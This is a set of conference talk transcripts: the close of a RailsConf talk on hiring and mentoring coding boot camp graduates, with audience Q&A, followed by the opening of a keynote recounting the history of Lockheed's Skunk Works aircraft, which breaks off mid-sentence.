ad and other ads and how do we get a sequence of ads where we don't repeat ourselves however many times or we don't have two ads adjacent. Things like that. The ability to adapt to new and changing requirements. This is huge. This is probably the hardest thing to handle in an interview when someone says, great, that's a good solution, those tests passed, that looks nice. What about this? There's a new edge case or there's a bug or the client loves it and three weeks later there's a new request that completely turns on its head all the stuff that you just did. Working with that, changing nature, dealing with kind of ambiguity. Rarely do we get full specifications, complete requirements, very rarely does someone come to us and tell us exactly what they want. The ability to work well with others. This is why I want to do pairing and sort of collaborative interviews rather than adversarial ones. I think we should be working with interviewees and not literally challenging them to do better than someone else has done on this problem or do better than you yourself have done. Passing along the pain because you had to do this when you were interviewing. That was terrible and so everyone should feel terrible. We should stop doing that. The ability to work well with others is huge. To collaborate with someone remotely or in person and solve a problem. I look for people who are passionate about learning. People who deeply want to be better or to know more or to know why. It doesn't have to be computing science. It can be people who are passionate about learning the guitar or learning philosophy or learning music. I need people who are excited to learn and to become better because those are the people who are not going to be satisfied when ten clients are fine and one says, I have this weird bug sometimes but I guess it's fine because I don't see it a lot. It only happens on one machine or it only happens sometimes or someone has devised a bizarro work around for some tool that you built and rather than actually fixing it, you're like, well, they seem okay. I want someone who is really looking to improve and to learn and to grow. Finally self-awareness. This is the crucial one. This is the one that underscores and informs and reinforces all the rest. People who are self-aware understand how they come across to other people. They understand how to work as part of a team. They understand how to manage the changing dynamic not just of the code but of the people they're working with. When people change roles, when people join, when people leave, being able to deal with all these things, the root of this is self-awareness. I encourage you to try to, when interviewing, figure out what signs are associated with self-awareness and then look for those because I think without self-awareness, we're really in trouble. Finally, this last one on the slide. Peter Norvig. There's a link to this. I'll tweet the speaker next slide so you don't have to memorize a shortened URL. Peter Norvig found actually a negative correlation, not a non-correlation but a negative correlation between people who are good at whiteboard interviews, traditional interviews, and job performance. I don't think that means that people who are good at interviewing are necessarily bad at software engineering. What I think it means is that interviewing is a separate skill from the jobs that we do. There are people who are very, very good at engineers who are not good at traditional interviews. There are people who are very, very good at traditional interviews who are not very good at engineers. That brings us to our next hand-raising exercise. Raise your hand if you now are or have ever made the jump from individual contributor to manager. If you're familiar with that management, keep your hand in the air if you believe that the very best developers make the very best managers all the time. My hand also went down. We understand intrinsically there is a difference in these skill sets. Being an excellent developer does not make you an excellent manager. It's a separate skill that can be learned. Interviewing is the same deal. Interviewing is a separate skill from software engineering that can be learned. Yes, you can go out and get really good at interviews and get tons and tons of offers, but I don't think that's the right answer. I think the right answer is to fix interviewing. I think this kind of identification of the mistake we're making and actively taking steps to address it is part of that. Now, I'm obligated to tell you that Hulu is hiring. If you're interested in working at Hulu, come find me. I put a card up on the job board. I'm always happy to talk about what we're doing at Hulu, what my team is doing, things like that. My contact info will also be up on the final slide if you want to send me an email or tweet at me or come find me on GitHub or something like that. Now we've looked at what interviewing can be like or what problems with interviews that there are that we can address. We've looked a little bit at how boot camp graduates differ from those with more traditional backgrounds, getting a sense of how we might modify our practices. I want to turn now to how we can help folks grow and learn on the job. I also want to underscore again, this is kind of a fib. This is kind of like a misleading talk title because this is about everyone, not just about boot camp graduates, although, like I said, it's a good lens for investigating this. If you take nothing else away from this talk, I'd like you to take this away. This is the most important thing in the entire talk. The belief that you can improve, that you can grow, and moreover that your culture is one of growing and learning and getting better. It's super important, so I'm just going to read it to you, even though I hate when people read things to me. The belief that you can improve your abilities results in better performance than if you believe you either have it or you don't. Carol Dweck, I hope I'm pronouncing her name correctly, wrote a paper a bit ago, is math a gift? Beliefs that put females at risk. Later, a book, she also wrote, called Mindset, New Psychology of Success, which investigates this kind of dichotomy. Are we born with it? Are we talented? Are we innately good? Or is this something that we learn through practice? It turns out when you prime someone on a task with the belief that they can get better through practice, they will actually do better than if you prime them with, like, don't worry about it. Some people are good at math, some people aren't. Here's a math test. They will do worse than the people who you say, listen, no pressure. This is a thing you can get better at through practice and dedication and it's a learned skill. So like I said, if you take nothing else away from this talk, please take this away, that the belief that you can grow and making sure your culture is one of growing and getting better is what underpins the whole thing. So there's a bit of a talk within the talk here, this kind of talk-ception type thing. So more exercises. How many of you, this is your very first RailsConf? Oh, wow, that's awesome. Cool. I'm a little bit of a little labor here and I'm always super excited. So welcome. This is really cool that you're here. If you were at RailsConf two years ago, Chuck Larvos did a talk called Building Kick-Ass Internal Education Programs for Large and Small Budgets. And so if you saw that, that's awesome. If you haven't seen it, I encourage you to watch it. The links to the slides and to the YouTube video are here on the slide. But if you didn't see it, you don't have to wait. I'm going to kind of TLDR it for you because I think all of his ideas are awesome and are part of growing people who you've now welcomed into your organization. So here's the plan real quick. One you don't have to know everything, which is good. Second, start Monday. This is something that you can do immediately. This is not something you have to wait for. This is not something, hopefully, that you need tons of approval to do. Two examples of things that we can do are lightning talks. They're lightning talks here at RailsConf. They're lightning talks at Meetups. You can bring them to your organization. They can be about anything. You can also do kind of more in-depth workshops, lunch and learns, kind of a weekly, maybe half hour type thing, and talk about XYZ. We'll cover a couple topics that I've found in my career have been valuable. And finally, the idea of the Accountability Buddy. This is good for a lot of things, and we'll touch on all of them. But essentially, pairing new hires with people who are more experienced in the organization to help with onboarding and things like that. So we'll go through these in a little bit more detail. And hopefully my speaking speed is still good. I'm getting really amped up. This is like my fourth cup of coffee, too. I haven't seen any waving or flailing, so that's good. I'm not going too, too fast. So one, like I said, you don't have to know everything. The good news is you literally can't. I know I just told you that I should be priming you on things that you can learn and get better at, but unfortunately, you cannot get better at knowing everything. It is impossible. So don't worry about it. So I can teach someone how to do something is an excellent way to learn it yourself. So if you teach someone something, you're not only spreading knowledge through your organization, you're getting better at it. You encourage someone else to teach things. They get better at it. And it's sort of a domino effective of goodness, which is nice. And this kind of little zen bit at the end is just my reassuring you that you don't have to know where you're going. You can start this on Monday and not have an end in mind. That is totally fine. As long as you keep working on it, it will grow organically. So please do start on Monday when you go to work. It's Monday, May 9th, 2016, this coming Monday. You should feel empowered to do this. This is something that you shouldn't really need your bosses, bosses, bosses signature in order to go and go do. So I encourage you to sort of take this into your own hands and start this education program yourself. And like I said, you don't have to know everything. You don't have to know where it's going. You just have to have a couple of seeds. And like I said, we have a few slides ago, we solved interviewing forever, which is awesome. So now that interviewing is solved, hopefully the folks in your organization are interested in growing, interested in learning. They should be pushing already to do something like this. You should have something kind of like bubbling under the surface if you don't already have an internal education program. So hopefully momentum will be easy to achieve. Like I said, lightning talks are an excellent way to start this. You can say on Monday, hey, we're doing lightning talks on Friday, 4pm, and prepare something. That's a good first step. They can be technical, they can be non-technical, they can be in-house. You can do the meetups, you can practice your next RailsConf talk as a lightning talk. The sky is a limit. And remember that teaching something is a great way to learn it. Lightning talks are, like I said, a part of RailsConf. You should totally sign up to do one. I don't know when and where signups are. I do know that the lightning talks this year are Thursday from 5.30 to 7pm. I think that it's in the RailsConf documentation and all the excellent stuff that we've gotten from the RailsConf organizers. So I encourage you to sign up for one, or at the very least go see one so you can get a sense of what lightning talks are like and what you might be able to bring to your organization. Again, I apologize for throwing a bunch of links at you. These will be much more valuable when the slides are online, which will be later today. These are just some gist that I've picked up over the last couple of years to sort of come up with curricula, right, for in-house programs. So the ones that have been really valuable are Git. And these tend to be more valuable for actually folks who do have computing science backgrounds who have not necessarily worked with lots of other developers on huge projects. So learning Git, right? Learning how to rebase and squash commits, learning how to use Git bisect, which is huge. So there's a link here that kind of just goes through like 10-ish weeks of Git and half-hour training. Equiskrip 6 or 2015 or 2016 or JavaScript next or Harmony or whatever it is we call it. There are a lot of people who are super interested in this and just like you're working on an older code base. You don't have the opportunity to switch it up. Again this is something that even folks with a traditional background might be interested in because you probably don't get a chance to do a lot of JavaScript in undergrad, which is probably good. And these last two I think are valuable for folks who have backgrounds that are non-traditional. These are functional programming. This is through the lens of JavaScript. It can be functional programming in Ruby or Python or whatever it have you. And the last one is data structures and algorithms for web development. So when you do have a tree problem, when you do have a graph problem, you can go through these exercises and you can use these hopefully as a basis for your own education programs. And again these are just, they've been edited, revised, they're constantly growing and changing. And I think being open to that change is huge. So if you say hey, Friday is at lunch, we're doing lunch and learns, here's the topic or here's some topics like we should kind of vote on what we want to do, we should go in this order, we should talk about this thing. Again they're going to kind of evolve and grow organically. So I encourage you just to get, just kind of plant the seed, plant the tree and let it grow. And finally, accountability buddies. This is obligatory South Park reference which is a Hulu show. If you don't subscribe to Hulu, you can subscribe to Hulu and you can watch South Park. My boss did not tell me to do that. So the idea is to pair new people with a mentor from the organization for say the first three months. I think Chuck in his talk said onboarding time went down drastically by doing this. It was something like it took six months to spend somebody up before the institute of the program and now it takes three. So you can expect, anecdotally I've had similar results. You can expect a very noticeable reduction in onboarding time simply by having a mentor for someone to go to and say hey, how do we deploy this thing? What does this service do? How do I make coffee? Like all these things that you want to know very early on in your time at a new company that say HR is not going to be able to help you with. It's not benefits related, it's not things like that. It's kind of the day in, day out of developing software or staying alive in the case of coffee. And like I said, this is a thing you can do immediately. So I think this is the last hand raise I'm going to inflict on you. Raise your hand if you feel prepared to do this on Monday, May 9th, 2016. Even just to like send out an email or a hip chat or a Slack thing and be like hey guys, what do you think of this? I feel like I don't see enough hands up. We'll talk after if you feel unprepared. We will get you prepared. You'll be good. And that's the end of the audience participation so you guys can relax now. I'm not going to call on you. Okay, so you've gotten this far, thank you. This is the TLDPA, the Too Long Didn't Pay Attention. This is sort of the whole talk in three bullet points. So essentially it's this. I would encourage you to write down what you're looking for when you're interviewing someone. I mean actually like write it down. Say here are the skills that we're looking for. Here are the personality traits. Here's what we want people to know how to do. Here's what we like. Here's what we need. And compare that against what you're interviewing for. And if you're not getting at those things with your interviews, it shouldn't be surprising to you that you're not finding the right folks. And hopefully this is kind of like oh man, eye opening type of thing. This is not meant to make anyone feel bad about interviewing. Like we said, there's a reason there's like an interviewing is broken blog post like every week. And hopefully this is a nice way to fix it. And like I said, we'll help fix it. But you know, oftentimes what you're not, you're not looking for someone who is a computing scientist. Sometimes you are. Sometimes you have very academic problems or problems that have a very traditional route. And that's great. You should, if you need someone who can write a red black tree and balance it from memory or avial trees or splay trees or other data structures that I only know the names of, that's fine. You should hire those people. But oftentimes that's not what we need. And we should be aware of that. I think also that we need to look for strengths, identify what makes someone shine, what makes someone valuable rather than probing for weaknesses. Because we're always going to be disappointed if we prep for weaknesses, right? Like we're going to be disappointed if we find one. We're going to be sort of mad if we don't. Like all right, well whatever. Like I guess this person is way better than me. That's fine. Hopefully that doesn't happen. But essentially we want to know what someone can bring to the table and not focus on where their weaknesses lie. Second, like I said, this is the whole theme of the talk. I encourage you to take this away if nothing else. Believe in improvement. Believe that you can be better. Believe that improvement is part of what we do all the time and work to make that part of the culture. And finally sort of be the change you want to see in the company. I'm reasonably sure I stole this from Gandhi in some capacity. But it's not just the code base. It's not just the kind of the Boy Scout rule of leave things better than you found them. Finally you need to apply this to your culture to identify what it is that you need and want, how to get better, and to iterate on your culture the same way that you iterate on your code. Because fundamentally all tech problems are people problems. At some point in the chain of events, some human was typing stuff into a keyboard. So I encourage you to keep that in mind that every single problem that we have technically is also at its heart a people problem. And that's nice because while machines are little deterministic or non-deterministic boxes of feelings that do what they want, humans are also kind of like that but are easier to understand, I think. Anyway, so thanks again for coming to my talk. I really appreciate it. Like I said, if you have questions, we'll take time for questions. For some reason we don't have time. Please do feel free to come up to me and look for me all throughout the rest of RailsConf. I'll be here. Like I said, all my contact info is up here on this slide. So feel free to reach out. If you do want a copy of Ruby Wizardry or you have questions about it, please let me know or feel free to take advantage of the discount code. And thanks so much. Sure. So the question is for bootcamp graduates, they often have portfolios of work. Do we read their code? You might have seen if you read Hacker News, which I try not to, or at least not the comments. There was a blog post recently that was like, you know, forget you. I'm not going to spend two hours reading your code. I'm not going to spend two hours reading your stuff. I'm not going to look at your website. I strongly disagree with that. I do a lot of interviewing. I'm super busy all the time. I make time to look at portfolios. I make time to read stuff on GitHub. I'm not going to read everything. I might just kind of go straight. If you have a Rails application, go straight for your controllers and see what's going on because there's a lot of doom there. I might go and take a look at a project you've done. I might pop the console and kind of dig around in the JavaScript and say, oh, this person is using React. That's really cool. I might go and look and see how you're thinking about structuring JavaScript applications or how your Ruby application is built or if it's a language I've never seen before. Try to learn something new. But yeah, the short answer is I do, if there's a portfolio or a GitHub profile or something like that, I do try to read that because I think it's super valuable. Sure. So the question is we get a ton of applications, at least in terms of bootcamps, for every single position that is appropriate for someone who's graduated from a bootcamp in terms of background and skills. How do we do a first pass? How do I cut that down to a reasonable manageable number? So some things that I do, and these are sort of ad hoc anecdotal, I read resumes pretty carefully. I know that this is going to be frowned upon by some folks, but I look to see if someone has updated their resume that it's the most up to date, I will take a look and say, hey, are these things spelled right? Are these technologies that we use? Are these things that we're interested in? I'm kind of a weird stickler for that stuff, but I firmly believe that in the age of spell check and the age of being able to ping someone in your organization and say, hey, can you look at this or I guess not your organization because then they would know that you were interviewing. But your friends would be like, hey, can you look at my resume? Can you look at my application for this job? I firmly believe that people who are really spending a fair amount of time or are interested in an organization will go ahead and do that. Essentially science, it's someone's kind of shotgunning, right? And it's easy to do. And it's really stressful when you're coming out of a program like a bootcamp and you kind of want to maximize your chances for success. It feels like it is kind of a heavy ask. Like, well, do you super want to work at Hulu or do you just want to sort of work somewhere? Right? But again, like I said, the culture stuff, the desire to learn, the desire to grow, the desire to do meaningful work, I think is sort of tied into people picking and choosing the places that they want to interview. And so I kind of look for science that this person has looked at my organization in particular on purpose. So oftentimes, like things that don't come with a cover letter, I'm kind of bummed. Like I like to read cover letters. I like people to explain why they want to work on a particular problem or a particular team. So that tends to actually screen about half of people. Half of people have something about it. And I apologize for being a Hulu who was swayed by things like typos. But it basically knows that people seem interested. And I'm actually super interested if you guys have ways of doing this or things I can do better. Because like I said, this is an iterative process. So I'd love to get better at interviewing. If you guys have tips, please do come find me. Sure. So the question is, is there anyone at Hulu or I suppose anywhere really who's not swayed by this, who kind of thinks interviewing is not broken, that it's fine the way it is, and what would be my advice to folks coming out of boot camps to win these people over? Yeah, the answer is for any sufficiently large organization, you're going to find this. I do know people everywhere who firmly believe that if you can't do a graph traversal problem on a whiteboard, you don't deserve to work as a software engineer. That there's no space for people who don't have that background. That somehow they're missing something so fundamental that the only solution is to go learning that thing and come back. And that is one option. There are books like Cracking the Coding Interview. There are a number of websites that kind of teach you dynamic programming problems. They teach you graph traversal, treat traversal, things like that. So you can meaningfully tackle 80% of whiteboard interviews in D5. That is one option. I found in my career that it is impossible to reason people out of positions they didn't reason themselves into. So if someone has reasoned themselves into the belief that you need to know these things, I think logic does seem to work pretty well. So I'll sit and we do debriefs, we do little round tables after interviews. And someone will say, well, this person, we're interviewing them for a front end job or interviewing them to work on a legacy Rails application. And they do have 10 years of experience doing Rails stuff, but I asked them a dynamic programming question and they couldn't really do it. And they'll say, OK, well, what dynamic programming problems have we done recently? What is the impetus for this idea that what you're interviewing for is valuable for the thing that we need? That's sort of how I win them over. I think as a bootcamp graduate, the best you can do is kind of say, hey, listen, this is a thing that I think is interesting. Here's the best solution I've got. Does it seem reasonable in an interview? And it's hard to not want to just throw the marker and give up and be like, listen, I can't do this. It does seem reasonable to say, can we work on this together? That works maybe half the time. Sometimes the interviewer just thinks that is like a ask for a pass and that's no good. But I think most interviewers, if you say, hey, here's what I think seems reasonable. You just give it the ugliest, brute, forciest, naïve solution you can't say. Does this seem to work? And then most interviewers will say, yeah, that does work or that doesn't work. Or did you think about this? And then they're willing to sort of work with you on it. Short term, unfortunately, the best answer might be learn how to do these things while people hopefully like us, like me, like you kind of go and try to promulgate this new theory of, or maybe not new, this hopefully better theory of interviewing. It will take time, but I'm optimistic. Short. So the question is, can I expand a little bit on what I mean by self-awareness and down the line sort of what does that look like? Does that sound cool? So when I say self-aware, what I mean is the person is nice, right? This is someone you enjoy talking to. This is someone who will not talk over you, right? Some examples. Someone I will sometimes purposely say something that's sort of a generality. It's not quite right. It's close. I'm going to listen to see if that person will say, well, actually, I guarantee you like 99.99% of sentences I start with, well, actually, you just should stop listening to the rest of that sentence because it's not useful for your life. I will spend some time saying, okay, well, you know, I try to avoid like the very transparent like, tell me about a time you had a disagreement with a coworker, right? But say, hey, so that sounds really cool. That doesn't sound like, that seems like an unorthodox way to do that. What did your team think of that? Or what did your boss think of that? Or hey, it's really cool that you're using Elixir at work. How hard was it to kind of get buy in? Like how did you do that? And look for clues. Like did that person sort of stampede people? Did that person kind of put it out there and everyone kind of said, no, and they sort of did it anyway, right? Like we've, we've all seen people who kind of go off and sort of do their own thing. Getting a sense of does the person seem empathetic to the problems that you have in your organization when you describe it? Or do they kind of say, oh, I know how to solve that. Or that's a dumb problem. I don't really care about that problem, right? Sort of do they seem aware of how they come across? Like do they seem aware if the interview is going well or poorly? Things like that. In terms of how that sort of evolves over time, I found that people who are more self-aware in organizations tend to do much, much better. And again, because working at an organization, you're working as part of a team. You have to be aware of how you come across. There have been some exceptions where I know people who are not super self-aware, but they've managed to find like a manager who's like, who is, and they're like, oh, don't worry about so and so. Like here's when they said that thing, here's what they meant. Or here's, here's actually like, I know that came across kind of harsh, but here's actually what they said. And that can sometimes work if you've got someone who's super, super talented but has trouble. But I found most people will do their best to, if it's kind of quietly brought to their attention by a peer or a superior, they'll try really hard to be better. I hope that kind of answers your question. Right. Right. So the question is, is there something above and beyond sort of as you're growing people beyond these kind of like periodic touch points to ensure that your employees are growing, that the organization is, essentially the communication is still working is what it sounds like. So certainly having those, those periodic touch points are valuable and I think necessary. So you do want to have one on ones with your team members. You do want to make sure that there are larger team meetings less frequently that sort of are used as two directional condiments. And I think that's probably part of it. So above and beyond having these touch points, I think it's important for meetings between like management and your team or however your organization is broken down are two way. Right. So it's not just the organization, you know, the business leads coming to you and saying, hey, here's, give me a status update. Right. And then sort of them knowing what engineering is doing secretly when they're not watching. It's I think more about having a two way communication. Like when I do one on ones, I make sure that I say, you know, is there anything you need for me? Am I blocking you? Is there anything that you want to talk about stuff like that? But I'll also say, hey, here's some things that I know are happening soon. And you might need them for context and why we're prioritizing a particular project. You might need it to sort of understand why we're being asked to do what we're doing. And I think that's valuable. Right. Because no one really likes to work in a vacuum. So making sure that communication is two way, I think is super valuable. Another thing is to, like I said, make sure that this notion of growing and getting better is a truly cultural thing. Right. Culture is always, always, always set at the top of your organization. So if at the very top, there's no buy in for an internship program or there's no buy in for continuing development, if there's no buy in for programs like that, it's going to be, it's going to be hard. And like I said, this is something you should feel empowered to do on your own. And I think you can, you can grow it up to the top. But if you meet active resistance, right, like we're not spending money on that, we're not spending time on that, you guys should be pushing features and not learning things. That's a signal to go somewhere else possibly. So I guess above and beyond those touch points, those two things seem appropriate to me. Making sure that communication is always two way and making sure that you do everything you can to kind of pass upwards. So like when I have one of those with my boss, he'll tell me about what's going on. But I'll also say, hey, like my team is super interested in this. Can you push this along? And so you can have a large effect for just your team doing just you and things will go well. But I found that the multiplier is having the folks at the very top also. Cool. So we're, we're at time. I don't want to impinge on the next talk. So thanks so much guys and please do find me. I assure you are the janitor's staff here.
|
In 2015, nearly a hundred programming boot camps produced thousands of graduates in North America alone. While boot camps help address a need for professional software developers, their graduates have different skill sets and require different interview assessment and career management than fresh college graduates with degrees in computer science. In this talk, we'll look at how boot camps prepare their students, how to interview graduates, and how to help them continually learn during their careers, developing a holistic model for hiring and growing boot camp graduates in the process.
|
10.5446/31504 (DOI)
|
I am very pleased to introduce our first evening keynote for RailsConf this year. Nicholas Means did a talk at RubyConf last year that was called how to crash an airplane. And I remember looking at this as it came through the CFP app and thinking this is going to be the most depressing talk ever. Because there's a talk about an airplane crash in 1989 in which 111 out of 239 people were killed. The amazing part of course being that not all 239 were killed. But it turned out to be a really, really interesting meditation on how people and computers interact with each other. Anyway, so when I saw this talk come through the CFP for RailsConf this year, I thought this is a talk that needs a wider audience maybe. And I was very pleased when Nicholas agreed to do this as a keynote. So please join me in welcoming Nicholas Means. All right, so I hope you guys have seen a lot of really great talks today and met a lot of really interesting people. Like Sarah said, I gave a talk at RubyConf this fall about United Flight 232. And in the intro to that talk, I said that I was a student of plane crashes. That's true. I am a student of plane crashes. I'm very fascinated by what goes on in the cockpit. What chain of events causes a plane to crash. But it's not the whole story about my interaction with aviation. I'm actually a huge aviation buff in general. And I have been as long as I can remember. I love planes as long as I can remember. I think it all started when I was eight or nine years old and my parents took me to an air show at Dias Air Force Base in Abilene, Texas. The featured attraction that day were the Thunderbirds, the Air Force's F-16 demonstration team. And they did all sorts of high-speed acrobatics. They flew in tight formations. It was amazing. It was incredibly impressive. But as great as they were, they weren't the thing that captured my imagination that day. The thing that really stuck in my young mind was standing nose to nose with this amazing machine, the SR-71 Blackbird. It's my favorite plane. I'm sure there's plenty of people in the audience that's your favorite plane, too. It's an amazing machine. You can just look at it and tell how fast it wants to go. It's got those razor-sharp leading edges, smooth curves. The engines are every bit as large as the fuselage. You can't really tell it from this angle. But seeing this plane, seeing it up close, and hearing about what this plane could do, started a lifelong obsession with aircraft for me. I went back home. I was in elementary school at the time, and this was before the Internet. So I went to my school library, and I had the librarian pull every book she could find that even mentioned the SR-71 for me. And I started reading about this plane, and I really haven't stopped since. Well, years later, my career has taken a decidedly non-aviation turn. I am the VP of Engineering at I-Triage in Wellmatch, and I spend my days leading teams of software engineers, but I'm still fascinated by airplanes and by stories from the world of aviation. Sometimes I even find wisdom in these stories about how we practice our craft and how we lead our teams. The story of United 232 was very much one of those stories for me, and this is one of those as well. So if you see an SR-71 in a museum somewhere, you should look for this logo on the tail. It's not always there, but sometimes it is. The reason for this skunk is that the SR-71 was designed by Lockheed Martin's Advanced Projects Division, better known as the Skunk Works. Now, companies use the phrase Skunk Works for all sorts of things, usually some top-secret project where they need a bunch of innovation and a hurry. But Lockheed Skunk Works was the original one. And today I want to tell you the story of some of Skunk Works' most iconic planes and the amazing engineers that built them. And to do that, I have to start with Clarence Kelly Johnson. Without him, there would be no Skunk Works. Kelly graduated from Michigan in 1932. He applied for work at Lockheed, and he was turned down. He went back to Michigan to get his master's degree in aeronautical engineering, and after he got his degree, he went back to Lockheed, and he was hired, not as an aeronautical engineer, but as a tool designer, for 83 bucks a month. Slowly, but surely, Kelly worked his way up the ranks. And the first plane he designed that you would probably know of is the P-38 Lightning. Now, if you've studied World War II aviation at all, if you've ever been to a World War II aviation museum, you have seen this plane. It's one of the most famous planes of World War II, and it was one of Pilot's favorite planes to fly. It was very successful in dogfighting. So Kelly kept himself busy working on that until intelligence started to come in that the Germans had developed a new plane, the Messerschmitt ME-262. Now, what made this plane remarkable is it's the first jet fighter that was ever placed into service. It was faster than anything the Allies had. The Germans had invested in jet propulsion far earlier than anybody else, and they were way far ahead of the Americans. Now, the British had offered the DeHavilland H-1B Goblin engine to the US, and the Air Force held a meeting with Lockheed and asked if they would be interested in designing a plane around this engine. The Air Force proposed that Lockheed build a single prototype, and they designated it the XP-80. Well, all along, Kelly Johnson had been pestering his bosses at Lockheed to set up an experimental aircraft division where he could let engineers and designers and mechanics work in close proximity to each other and communicate directly, not have to go through all the bureaucratic channels at Lockheed. And this seemed to the higher brass at Lockheed to be a perfect opportunity to give Kelly Johnson that. The only problem was Lockheed had no factory space available. This was in the middle of World War II. All of their facilities were busy manufacturing the P-38 Lightning. And so Kelly Johnson's first order of business was to rent a circus tent. He set this circus tent up next to an existing building on the Lockheed grounds. He installed phones, air conditioning, everything he needed to make it an office. The building he set it up next to was a plastic factory. And apparently it smelled terrible. So the XP-80 was a top secret. The team had been briefed to not reveal to anybody what they were working on, even when they answered the phone. And so because of the smell, Irv Culver, one of the structural engineers on the project with a reputation as a bit of a cut-up, took to answering the phone, Skunk Works, how can I help you? And the name stuck. So that's how Skunk Works became Skunk Works. And the contract for the XP-80 was signed on June 24th of 1943. And the team had been given 180 days to build this plane. The only concrete information they had was the dimensions of the engine. They didn't even have a mock-up. They had to build that themselves in-house from the blueprints. And they designed the plane around this engine. Normally they would have mocked up the whole plane before they started on building the production aircraft. But not this time. Kelly Johnson decided that the plane itself would be their mock-up. That they wouldn't mock the plane ahead of time. And his engineers would be free to design and manufacture parts on the spot to fit this plane. He also decided to do away with Lockheed's normal drawing approval process. He decided that if they were going to bring this plane in on time, they had to work fast. And that meant doing away with all the formality they were used to working with. So he cut all the style rules and approval chains that would normally apply to airplane drawings at Lockheed. And it worked. By November the 13th, they were done. Just 143 days from when they started, they had a complete plane. They took that plane apart, created it up and loaded it on a flatbed truck and drove it 70 miles east to Mirac Air Force Base in the middle of Mojave. Now, why did they do that? Because they needed lots of room for this thing to crash. They had no idea how it was going to perform. But it performed beautifully. After New Year's, it took flight for the first time and it flew like a dream. The prototype they flew that day would actually go on to be the first American plane to fly 500 miles an hour in level flight, the fastest plane built to that day. The production version, the P-80 shooting star, would go on to be the first jet deployed by the Air Force. And it flew well into the 80s. So they completed their mission in an unrealistic amount of time. They delivered this plane. But it started to look like maybe that would be the end of Skunk Works. This was the end of World War II. There wasn't a lot of money available for developing new aircraft. The Pentagon decided they really didn't need any new airplanes with no war going on. But that stanced and lasted very long. This picture is of Winston Churchill, FDR, and Joseph Stalin at the Yalta Conference in February 1945. This is one of the three conferences that the big three World War II allies had to determine how they were going to govern Europe after the war. This particular conference is the one where they decided they would split Germany down the middle and split Berlin with it. These three superpowers had united against the Axis powers during World War II, but that alliance didn't last very long after World War II. American and Russian ambitions were too much in conflict, and they quickly began ramping up military spending to make sure they kept up with each other. We had entered the Cold War. In addition to ramping up military spending, the other thing that ramped up was reconnaissance activity. Around this time, you have to understand that 55% of the American population thought that it was more likely that they would die from thermonuclear war than old age. And those fears weren't unfounded. Both sides needed to know what the other was up to, and they were willing to spend a ton of money trying to figure it out. The CIA was desperate in particular for information on this place, Kapustin Yar. This is Russia's primary secret missile development area. It's akin to Area 51 in the United States. And the Air Force considered an overflight of Kapustin Yar to be far too dangerous to do with any of the aircraft they had at the time. It was very heavily defended. They knew there was no way they could get in and take pictures and get back. So the CIA needed a different answer. Their intelligence indicated that Russian radar couldn't see over about 65,000 feet, so they decided to spec out a plane that would fly at 70,000 feet. Well, nothing had ever flown that high before, but they requested bids. And since they had no means of reconnaissance over Russia until this plane was ready, they needed this plane in a hurry. The bid request they put out called for this plane to be ready in eight months. So Skunk Works took a plane they had earlier developed, the F-104 Starfighter, which coincidentally is the first plane ever built that went Mach 2. It could go two times the speed of sound flying level. They took this plane and proposed that they modified it by dumping as much weight as they could, stretching the wings out to be as wide as they could, and changing the engine out to something that would function at 70,000 feet because nothing had ever flown that high before. They didn't know how to build a jet engine that would fly at 70,000 feet. Because their proposal was based on an existing plane, along with Skunk Works proven capability on the P-80 and the F-104 to deliver on time on tight deadlines, it won over the other manufacturer's proposals of new planes. The plane they built, of course, is the U-2. They started work in November of 1954. They took the U-2 and they lost as much weight as they could. They took the fuselage, made it as thin as they could, made it a wafer-thin aluminum. It was so thin, in fact, there's a story that an engineer accidentally bumped into this plane with a toolbox. A normal plane, that would be no big deal. But the U-2 left a four-inch dent in the side of the fuselage that they had to pound out. There was some concern that this plane would never be strong enough to fly. But eight months later, in July 1955, right on time, they had a plane ready. They created it up, loaded it into the belly of a cargo plane, and flew it out to a purpose-built airfield in the middle of a dried-out lake bed in the Nevada Desert. Why the Nevada Desert? Because they weren't sure this plane would fly, and they needed lots of places to land it. This picture, taken by Kelly Johnson himself, is of the actual first flight of the U-2 on August the 4th, just a hair over eight months from when the first metal was cut. A month after the first flight, pilots were breaking altitude records in secret almost daily over the Nevada Desert. By the time they were done flight testing this plane, it had been up to 74,500 feet, well above its operational ceiling, and it had flown over 5,000 miles over 10 hours on a single tank of gas. Now, how they do it? Despite the ability to fly three miles higher than any other plane built to that point, the U-2 was a remarkably simple plane. Weight was everything. Every pound cost the plane about a foot of altitude. So they cut weight wherever they could. This is a picture of the internal wing structure of the U-2. It weighs about four pounds per square foot. Most airplane wings weigh about 12 pounds per square foot. So this is a third the weight of a traditional aircraft wing. To me, it looks like a cheap metal awning. There's just not a lot of material there. And of course, this introduced a lack of rigidity in the wing. So the U-2 is known for when it hits turbulence, the wings will flap like a seagull. It's not the pilots to death, but the wings never broke off. The U-2 was also designed with tandem bicycle landing gear. If you look closely at this picture, there's no wheels under the wings. There's only two sets of wheels under the centerline of the fuselage. The combined weight of this landing gear mechanism is 200 pounds. It's the lightest landing gear that's ever been deployed on a jet aircraft. And it's easier just to show you how this works. So we're riding along in a chase car here behind a U-2. The reason they have the chase cars is because the pilot is in a bulky pressure suit and literally can't see where they are in relation to the ground. So the driver in the chase car is constantly calling out the altitude to them, telling them how close they're getting to the ground. And the plane, you can't land it. It wants to fly so badly, you literally have to stall it into the ground. You have to bring it down to about a foot and then stall it. And then the pilot has to fly it down the runway. He's literally flying the plane, balancing it on two wheels down the runway until he finally bleeds enough speed off to tip the plane over onto its wing. And then they have to put landing gear under the wing so that it can taxi the rest of the way into the hangar. Now look at these guys pulling on the wing on your left here. Look how much this wing is bending as they're pulling, trying to get the other wing off the ground. It's ridiculously flexible. They finally get the Pogo gear under the wings. And this is how it takes off as well. It leaves the hangar with these under the wings and those fall off as it reaches speed and finally lifts off the ground. It's a total hack. And the reason is that every part of the U2 served only one purpose. And the purpose of this plane was to get this payload to 70,000 feet over Russia. This payload, which is currently in the National Air and Space Museum in Washington, is a high resolution camera with 36 inch focal length that could resolve an object that was 2.5 feet across from 70,000 feet. Keep in mind this is the 1950s. This is the highest resolution camera that has ever been built. And because that's what they cared about, they hacked the rest. They could have made the wings more rigid so they didn't flap, but it didn't matter. They could have put different landing gear on it so that it would be easier to land. It didn't matter. This is actually a modern day U2. This plane is still in operation. It still has the same landing gear configuration. The wings are 20 feet wider. It has 30% more payload capability. But they never changed that crazy landing gear configuration because it works. They didn't need to. But they had a problem. The operating assumption that Russian radar couldn't see above 65,000 feet turned out to be incorrect. Almost from the first flight U2 took over Russia, MiGs were chasing at 15 and 20,000 feet below. They were firing missiles at it. Now nothing could get up to its altitude, but the CIA was afraid that they 